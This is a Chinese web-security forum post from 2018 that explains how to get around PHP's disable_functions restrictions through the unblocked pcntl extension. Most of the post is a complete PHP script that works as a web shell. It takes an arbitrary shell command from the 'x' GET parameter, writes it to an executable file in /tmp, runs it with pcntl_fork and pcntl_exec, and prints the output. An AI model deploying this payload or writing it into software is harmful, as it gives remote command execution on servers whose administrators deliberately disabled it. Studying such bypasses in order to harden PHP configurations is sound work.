历史记录

    清空历史记录
    • 相关的动态
    • 相关的文章
    • 相关的用户
    • 相关的圈子
    • 相关的话题
    注册 登录
    php绕过大部分禁用函数限制执行命令
    postma****@lanme WEB安全 18060浏览 · 2018-05-31 03:49

    大部分被禁用的是这些函数,然而泄露了一个pcntl
    被禁用的函数(disable_functions): passthru exec system chroot chgrp
    chown shell_exec proc_open proc_get_status popen
    ini_alter ini_restore dl openlog syslog
    readlink symlink popepassthru stream_socket_server

    <?php

header("Content-Type: text/plain");

$cmd="/tmp/exec";
@unlink($cmd);
$c = "#!/usr/bin/env bash\n".$_GET[x]."> /tmp/output.txt\n";
file_put_contents($cmd, $c);
chmod($cmd, 0777);
$cd="/tmp/output.txt";
print_r(file_get_contents($cd));


switch (pcntl_fork()) {

  case 0:

    $ret = pcntl_exec($cmd);

    exit("case 0");

  default:

    echo "case 1";

    break;

}
    5 人收藏 2 人喜欢 转载 分享
    10 条评论
    某人
    表情
    可输入 255
      发布投稿
    热门文章
    优秀作者
    目录
    先知社区
    本站/app由 Djingoii 提供技术和产品支持